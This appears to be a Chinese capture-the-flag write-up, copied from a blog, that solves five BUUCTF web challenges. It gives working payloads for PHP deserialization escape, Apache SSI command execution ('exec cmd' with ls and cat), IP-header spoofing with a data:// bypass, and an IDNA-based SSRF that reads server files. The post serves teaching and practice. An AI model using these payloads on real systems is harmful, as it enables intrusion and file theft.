目录

安洵杯2019 easy_serialize_php (反序列化中的对象逃逸)

[0CTF 2016]piapiapia(反序列化逃逸)

[BJDCTF2020]EasySearch(Apache SSI远程命令执行漏洞)

[MRCTF2020]套娃(php解析特性&CLIENT-IP&逆写程序)

[SUCTF 2019]Pythonginx(ssrf&idna与utf-8编码漏洞)

安洵杯2019 easy_serialize_php (反序列化中的对象逃逸)

 <?php$function = @$_GET['f'];function filter($img){  # 过滤掉array里的内容,置换为空$filter_arr = array('php','flag','php5','php4','fl1g');$filter = '/'.implode('|',$filter_arr).'/i';return preg_replace($filter,'',$img);
}if($_SESSION){unset($_SESSION);
}$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;extract($_POST); # 存在变量覆盖if(!$function){echo '<a href="index.php?f=highlight_file">source_code</a>';
}if(!$_GET['img_path']){$_SESSION['img'] = base64_encode('guest_img.png');
}else{$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}$serialize_info = filter(serialize($_SESSION)); #序列化后的$_SESSION用filter函数过滤if($function == 'highlight_file'){highlight_file('index.php');
}else if($function == 'phpinfo'){eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){$userinfo = unserialize($serialize_info);echo file_get_contents(base64_decode($userinfo['img']));
}

审计代码,get传参f参数是function,题目提示说 phpinfo里可能有东西 我们去看一下

可以看到这里包含了flag文件 flag应该就在这个d0g3_f1ag.php里

得到flag文件的利用点:

else if($function == 'show_image'){$userinfo = unserialize($serialize_info);echo file_get_contents(base64_decode($userinfo['img']));
}

构造 base64_decode($userinfo['img']) 为我们的d0g3_f1ag.php

$userinfo['img']应该是 ZDBnM19mMWFnLnBocA==

即$serialize_info 序列化内容里 键值为'img'的其值应该是 ZDBnM19mMWFnLnBocA==

而 $serialize_info= filter(serialize($_SESSION))

所以我们应该构造我们的SESSION

此题存在反序列化逃逸

反序列化的对象逃逸问题一般分为两种,首先是过滤函数分为两种情况

  • 第一种为关键词数增加
    例如: where->hacker,这样词数由五个增加到6个
  • 第二种为关键词数减少
    例如:直接过滤掉一些关键词,例如此题
extract($_POST); # 存在变量覆盖if(!$_GET['img_path']){$_SESSION['img'] = base64_encode('guest_img.png');
}else{$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

extract($_POST)就是将post的内容作为这个函数的参数。

然后就是变量覆盖。如果post传参为_SESSION[flag]=123,那么之前的$_SESSION["user"]和$_SESSION["function"]的值都会被覆盖

我们看一下,在img_path为空时,$serialize_info内容:

因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,所以要传_SESSION[img]=s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

但是我们发现我们构造的img被覆盖了,因为在post的后面 又重新给$_SESSION[img]赋值了。

这里就利用到了filter函数

如果我们传入  _SESSION[imgflagphp]=1111 会发现 s:10:"img" 我们输入的flagphp被替换为了空,只剩下了img,这样就有反序列化逃逸那味了,逃逸了7个字符。  那我们是不是可以根据此来构造一个反序列化传,把后面的他重新给$_SESSION[img]赋的值整外面去呢。

看一下这个序列化串:a:2:{s:10:"img";s:4:"1111";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

我们想的是,能不能让 s:10: 成功读取红色部分,然后后面串里的内容就为自己所控

构造_SESSION[imgflagphp]:;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

发现好像可行,我们去试试

结果不行:

原因:看前面的a:2那里,如果我们这样构造的话,序列化内容就不满足a:2了。(即有两个元素)

我们再构造一个元素就行了。

payload:;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";} 添加了一个 s:1:"1";

成功!! 回到题目,post之后页面无内容

查看源码:

再次构造一个/d0g3_fllllllag base64encode一下 读取

payload:;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

[0CTF 2016]piapiapia(反序列化逃逸)

拿到一个登录框,什么也不知道,扫一下目录 扫出来了 www.zip

得到了 class.php,profile.php,index.php,register.php,config.php,update.php

审计可知:

我们先去 register.php 注册一个长度>3 <16的username和password

登录,index.php源码里有:header('Location: profile.php');

看一下profile.php里的内容  调用了user类的show_profile($username)函数

有一个反序列化的点:unserialize($profile)

$photo应该就是读取flag的点,需要构造$profile序列化'photo' 键值为 flag文件位置

$profile=$user->show_profile($username);if($profile  == null) {header('Location: update.php');}else {$profile = unserialize($profile);$phone = $profile['phone'];$email = $profile['email'];$nickname = $profile['nickname'];$photo = base64_encode(file_get_contents($profile['photo']));

再看一下提示:header('Location: update.php'); 看看update.php内容

if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {$username = $_SESSION['username'];if(!preg_match('/^\d{11}$/', $_POST['phone']))die('Invalid phone');if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))die('Invalid email');if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)die('Invalid nickname');$file = $_FILES['photo'];if($file['size'] < 5 or $file['size'] > 1000000)die('Photo size error');move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));$profile['phone'] = $_POST['phone'];$profile['email'] = $_POST['email'];$profile['nickname'] = $_POST['nickname'];$profile['photo'] = 'upload/' . md5($file['name']);$user->update_profile($username, serialize($profile));echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';

规定了 phone,email,nickname的格式以及 photo的文件上传

然后看看class.php 里面有我们的user类   class.php 包含了config.php config.php里有$flag=' '

所以我们最后应该是要读取到config.php里的内容

看一下 update_profile()与 show_profile()函数内容

public function show_profile($username) {$username = parent::filter($username);$where = "username = '$username'";$object = parent::select($this->table, $where);return $object->profile;}public function update_profile($username, $new_profile) {$username = parent::filter($username);$new_profile = parent::filter($new_profile);$where = "username = '$username'";return parent::update($this->table, 'profile', $new_profile, $where);}

update_profile会王username的表里写入photo文件内容,show_profile则是从username的表里读取数据返回

filter函数

public function filter($string) {$escape = array('\'', '\\\\');$escape = '/' . implode('|', $escape) . '/';$string = preg_replace($escape, '_', $string);$safe = array('select', 'insert', 'update', 'delete', 'where');$safe = '/' . implode('|', $safe) . '/i';return preg_replace($safe, 'hacker', $string);}

一些特殊的符号会用下划线代替,而且 增删改查也被替换成hacker了

上面是审计部分,下面开始利用:

看一下profile.php里的,是把数组序列化$profile 反序列化之后 赋给$profile

然后再将上传的photo中的内容用base64表示

$profile = unserialize($profile);
$photo = base64_encode(file_get_contents($profile['photo']));

如果能讲photo中的文件名换成config.php,就可以了。这里就考察到了反序列化逃逸知识点。

类似于上面的一道题,不过是反序列化逃逸的另一种(关键词增加)。

如果我们正常上传一个文件的话 serialize($profile)应该是:

a:4:{s:5:"phone";s:11:"12345678910";s:5:"email";s:11:"123@163.com";s:8:"nickname";s:3:"abc";s:5:"photo";s:40:"/upload/202cb962ac59075b964b07152d234b70";}

但其实我们之前上传的nickname是可以用数组绕过正则的  传nickname[]=abc

a:4:{s:5:"phone";s:11:"12345678910";s:5:"email";s:11:"123@163.com";s:8:"nickname";a:1:{i:0;s:3:"abc";}s:5:"photo";s:40:"/upload/202cb962ac59075b964b07152d234b70";}

因此我们可以利用nickname来对后面的photo 实现序列化逃逸s:8:"nickname";a:1:{i:0;s:3:"abc";}s:5:"photo";s:40:"/upload/202cb962ac59075b964b07152d234b70";}

从而构造我们想要的photo数据

如何利用?

nickname我们可以输入 xxx"}s:5:“photo”;s:10:“config.php”;}这样就可以把后面的忽略掉但是这个xxx的长度我们要保证符合真实的长度。这里正好可以利用过滤里的方法,因为nickname是先序列化然后再过滤的,但是生成的序列化字符串的长度还是原来的。比如我们nickname输入的是where长度是5 经过过滤后变成hacker长度变成了6.这时我们就可以有一个长度的字符可以利用

比如构造: nickname[photo]=";}s:5:"photo";s:10:"config.php";}

序列化串为:a:4:{s:5:"phone";s:11:"12345678910";s:5:"email";s:11:"123@163.com";s:8:"nickname";a:1:{s:5:"photo";s:34:"";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:40:"/upload/202cb962ac59075b964b07152d234b70";}"

需要填充的内容是红色部分,同时我们还需要利用红色部分前面加xxx把前面的s:34:"";给满足掉,所以xxx应该为34个where,这样他变成hacker之后就会提供34个长度可利用字符,从而实现字符串逃逸!。

payload:nickename[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

之后回到我们的profile 查看图片

赋值base64解码后得到flag

[BJDCTF2020]EasySearch(Apache SSI远程命令执行漏洞)

进入题目,看见一个登录框

结合题目应该是存在文件泄露,最终在index.php.swp得到源码

<?phpob_start();function get_hash(){$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times$content = uniqid().$random;return sha1($content); }header("Content-Type: text/html;charset=utf-8");***if(isset($_POST['username']) and $_POST['username'] != '' ){$admin = '6d0bc1';if ( $admin == substr(md5($_POST['password']),0,6)) {echo "<script>alert('[+] Welcome to manage system')</script>";$file_shtml = "public/".get_hash().".shtml";$shtml = fopen($file_shtml, "w") or die("Unable to open file!");$text = '******<h1>Hello,'.$_POST['username'].'</h1>******';fwrite($shtml,$text);fclose($shtml);***echo "[!] Header  error ...";} else {echo "<script>alert('[!] Failed')</script>";}else{***}***
?>

审计得知:md5(password)的前六位为:6d0bc1

python爆破一下得到:2020666 2305004 9162671

import hashlib
for i in range(0,10000000):if hashlib.md5(str(i).encode('utf-8')).hexdigest()[0:6] == '6d0bc1':print(i)

go 一下之后 welcome to manage system 然后没了。。但是在左上角发现

burp抓包看一下header

看见了Url_is_here里的shtml路径。搜索得知是SSI注入

Apache SSI远程命令执行漏洞

SSI注入漏洞介绍

SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。

SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。

一个存在反射型XSS漏洞的页面,如果输入的payload不是XSS代码而是SSI的标签,同时服务器又开启了对SSI的支持的话就会存在SSI漏洞。

SSI注入条件

Web 应用程序在返回响应的HTML页面时,嵌入了用户输入

Web 应用程序未对相关SSI关键字做过滤

Web 服务器已支持SSI(服务器端包含)

利用方式

<!--#exec cmd="命令" -->
    <! #include file="文件名称"–>

这道题可以看出username处被写入了shtml文件。 <h1>Hello,'.$_POST['username'].'</h1>

构造payload:

<!--#exec cmd="ls" --> 执行ls命令

执行成功,返回了一堆 hash.shtml文件名称

<!--#exec cmd="ls /" -->

根目录下也没有flag文件。可能是在/var/www/html下面

<!--#exec cmd="cat /var/www/html/flag_990c66bf85a09c664f0b6741840499b2" -->

得到flag

[MRCTF2020]套娃(php解析特性&CLIENT-IP&逆写程序)

进入题目,在源码种得到第一关的代码:

$query = $_SERVER['QUERY_STRING'];if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){die('Y0u are So cutE!');
}if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){echo "you are going to the next ~";

$_SERVER[‘QUERY_STRING’]用于获取url中的参数

首先是我们传的参数不能带有_和%5f 否则会die()

然后我们需要传入一个 b_u_p_t参数,满足他不是23333 但是呢正则又要匹配我们的输入为23333开头和结尾..

如何绕过对_的过滤呢,我们可以利用php的解析特性

用%20,. ,空格,[,等来定义变量名称时,变量名称会把这些转化为_

绕过正则的话,/^23333$/这里的正则匹配是开头和结尾进行匹配。可以使用%0a即换行符进行绕过。

回车与换行的区别 - 知乎

我们访问一下 secrettw.php 在源码里发现了一串 JSFUCK编码

执行一下,弹出来了 post me Merak  post一下得到了源码 我们摘取其中有用的部分

<?php
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';function change($v){ $v = base64_decode($v); $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) + $i*2 ); } return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }

include了flag.php flag应该就在其中

想要得到flag呢,我们需要满足$ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' 两个条件,来执行file_get_contents汉()函数

一、满足$ip === '127.0.0.1' 我们可以在请求报种试着添加下面的字段

X-Forwarded-For:    banned

CLIENT-IP:     可行

X-REAL-IP:    banned

二、满足file_get_contents($_GET['2333']) === 'todat is a happy day'

可以用data协议绕过

data协议通常是用来执行PHP代码,然而我们也可以将内容写入data协议中然后让file_get_contents函数取读取

2333=data://text/plain,todat is a happy day

成功绕过,但是我们发现我们传入的file 还经过了change函数的处理,读取的并不是flag.php

这个change函数有一点点re那味了,我们逆着写一下 求一下输入什么会return flag.php

function change($v){ $v = base64_decode($v); $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) + $i*2 ); } return $re;
}

他会对我们传入的file先base64_dncode一下,然后遍历 chr ord啥啥啥

这里贴一下反写的php脚本:

<?php
function rechange($v){  $re = '';for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) - $i*2 ); }$re = base64_encode($re);return $re;
}
$file = 'flag.php';
echo rechange($file);

得到ZmpdYSZmXGI= 我们更改file为:file=ZmpdYSZmXGI=

得到flag

[SUCTF 2019]Pythonginx(ssrf&idna与utf-8编码漏洞)

进入题目,查看源码得到:

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():url = request.args.get("url") #读取urlhost = parse.urlparse(url).hostname #读取url种的主机名 例如:http://www.baidu.com/index.php?a=111 会读取到www.baidu.comif host == 'suctf.cc':return "我扌 your problem? 111"parts = list(urlsplit(url)) #提取url中的各个字段host = parts[1] #获取主机名即域名if host == 'suctf.cc':return "我扌 your problem? 222 " + hostnewhost = []for h in host.split('.'):newhost.append(h.encode('idna').decode('utf-8'))#先idna编码再utf8解码parts[1] = '.'.join(newhost) #组合成域名#去掉 url 中的空格finalUrl = urlunsplit(parts).split(' ')[0]host = parse.urlparse(finalUrl).hostname #获取主机名if host == 'suctf.cc': #判断是否为suctf.ccreturn urllib.request.urlopen(finalUrl).read() #读取finalUrlelse:return "我扌 your problem? 333"#<!-- Dont worry about the suctf.cc. Go on! -->#<!-- Do you know the nginx? -->

根据题目提示Dont worry about the suctf.cc. Go on!猜测应该是hosts文件suctf.cc绑定了127.0.0.1,既然是127.0.0.1我们可以尝试用file协议读一下文件

前两次通过parse.urlparse(url).hostname和urlspilt来判断主机名,如果是suctf.cc则失败,第三次经过idna编码和utf8解码后来判断是否为suctf.cc 。我们要绕过parse.urlparse(url).hostname和urlspilt 的判断

我们需要利用ssrf来读取flag,题目提醒了中间件是nginx,从nginx的一些配置信息找flag文件位置

Ngnix重要文件位置

配置文件存放目录:/etc/nginx
Nginx配置文件:/usr/local/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx

我们查看一下Nginx的配置文件:

应该是:file://suctf.cc/usr/local/nginx/conf/nginx.conf

但这道题有对suctf.cc 的限制,所以我们要寻找满足条件的字符,即经过idna编码然后utf8编码后是suctf.cc

idna与utf-8编码漏洞

℆这个字符,如果使用python3进行idna编码的话
print(‘℆’.encode(‘idna’))
结果
b’c/u’
如果再使用utf-8进行解码的话
print(b’c/u’.decode(‘utf-8’))
结果
c/u
通过这种方法可以绕过网站的一些过滤字符

参考:[SUCTF 2019]Pythonginx1_Joker. .的博客-CSDN博客

贴上爆破脚本:

from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():for x in range(65536):uni=chr(x)url="http://suctf.c{}".format(uni)try:if getUrl(url):print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])except:passdef getUrl(url):url = urlhost = parse.urlparse(url).hostnameif host == 'suctf.cc':return Falseparts = list(urlsplit(url))host = parts[1]if host == 'suctf.cc':return Falsenewhost = []for h in host.split('.'):newhost.append(h.encode('idna').decode('utf-8'))parts[1] = '.'.join(newhost)finalUrl = urlunsplit(parts).split(' ')[0]host = parse.urlparse(finalUrl).hostnameif host == 'suctf.cc':return Trueelse:return Falseif __name__=="__main__":get_unicode()

payload:l?url=file://suctf.cℂ/usr/local/nginx/conf/nginx.conf

发现 flag在 /usr/fffffflag

payload:l?url=file://suctf.cℂ/usr/fffffflag

注:还有一个字符℆,经过编码解码后是c/u

也可以利用其构造payload:

file://suctf.c℆sr/local/nginx/conf/nginx.conf

file://suctf.c℆sr/fffffflag

buuctf刷题9 (反序列化逃逸shtml-SSI远程命令执行idna与utf-8编码漏洞)相关推荐

  1. Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现

    目录 一.多后缀文件解析漏洞 二.Apache换行解析漏洞(CVE-2017-15715) 三.Apache SSI 远程命令执行漏洞

  2. BUUCTF刷题笔记

    BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...

  3. buuctf刷题-Crypto-联想脑洞-达芬奇密码

    buuctf刷题-Crypto-联想脑洞-达芬奇密码 给了两串数字和提示: (答案是一串32位十进制数字) 达芬奇隐藏在蒙娜丽莎中的数字列:1 233 3 2584 1346269 144 5 196 ...

  4. rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警

    报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...

  5. jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞

    ###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...

  6. 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选

    各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...

  7. java远程代码注入_Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-3241 )...

    原标题:Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-3241 ) 本打算慢慢写出来的,但前几天发现国外有研究员发了一篇关于这个CVE的文章,他和我找到的地方很相似.然而不知 ...

  8. BUUCTF刷题记录(7)

    文章目录 web [NPUCTF2020]ezinclude [NPUCTF2020]ReadlezPHP [GXYCTF2019]BabysqliV3.0 非预期1 非预期2 预期 [NCTF201 ...

  9. BUUCTF刷题记录(2)

    文章目录 web [De1CTF 2019]SSRF Me(未完成) [极客大挑战 2019]PHP [极客大挑战 2019]Knife [极客大挑战 2019]LoveSQL [RoarCTF 20 ...

最新文章

  1. 京东智能情感客服挽救一名学生生命,“可信赖的AI”用温暖前行
  2. matlab脑电信号处理,基于matlab的脑电信号处理
  3. hibernate oracle 插入 clob,Oracle CLOB在Hibernate框架下的一次应用
  4. (05)VHDL实现分频器
  5. Java基础——JVM内存模型
  6. HDU 4417 划分树写法
  7. 组合,聚合,关联,依赖 的区别
  8. 使用KELI调试单片机代码时,一定要用Open Project的方式打开。
  9. 处女座的约会(思维)
  10. 宋红康JVM 学习笔记
  11. php匹配正则的方法,PHP实现正则匹配操作的方法
  12. 公众号开发精品教程(4)——生成带参数的二维码及合成海报
  13. 文章转载-狂人日记-鲁迅
  14. python查看cpu温度_Python如何读取CPU和GPU的温度?
  15. ec20 模块移植 linux,移遠EC20 4G模塊Linux驅動移植和測試
  16. 极速PEu盘启动盘制作工具(2003内核)V06.6官方版
  17. 四个动作识别数据集的简介
  18. 软件测试第二课 等价类划分、边界限制和判定表的使用
  19. 入手Blackberry9000
  20. Andrews定理的证明(对称单峰多项式乘积保持对称单峰性)

热门文章

  1. python文件读写方法有writeline吗_python--文件读写操作
  2. 暑期2020“大咖说开源”之吴晟 | 如何做一个开源玩家
  3. 微信、支付宝简单问题解决链接
  4. MCDF实验_lab4(4)
  5. Nerf_studio 使用记录
  6. (附源码)SSM+mysql+微信小程序网易云音乐设计与实现 毕业设计261620
  7. sql server网页在线管理工具
  8. [小样本医学图像]‘Squeeze Excite’ Guided Few-Shot Segmentation of Volumetric Images
  9. 4-20ma转4-20ma 0-5v转0-5v 模拟信号隔离变送器
  10. LVS前后端负载搭建